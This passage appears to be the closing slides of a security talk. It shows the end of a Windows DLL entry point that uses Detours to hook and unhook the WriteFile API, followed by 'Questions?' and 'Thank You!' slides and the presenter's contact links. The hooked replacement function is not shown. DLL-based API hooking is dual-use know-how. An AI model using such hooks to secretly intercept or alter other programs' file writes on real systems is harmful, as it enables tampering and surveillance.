	if (dwReason == DLL_PROCESS_ATTACH) {
		DetourRestoreAfterWith();
		DetourTransactionBegin();
		DetourUpdateThread(GetCurrentThread());
		DetourAttach(&(PVOID&)Real_Write_File, Detour_WriteFile);
		DetourTransactionCommit();
	}
	else if (dwReason == DLL_PROCESS_DETACH) {
		DetourTransactionBegin();
		DetourUpdateThread(GetCurrentThread());
		DetourDetach(&(PVOID&)Real_Write_File, Detour_WriteFile);
		DetourTransactionCommit();
	}
	return TRUE;
}

Does it work? Video INC

The other one

Questions?

Thank You!

twitter: @Gironsec

Website: https://gironsec.com

email: [email protected]

All code here: https://github.com/joseph-giron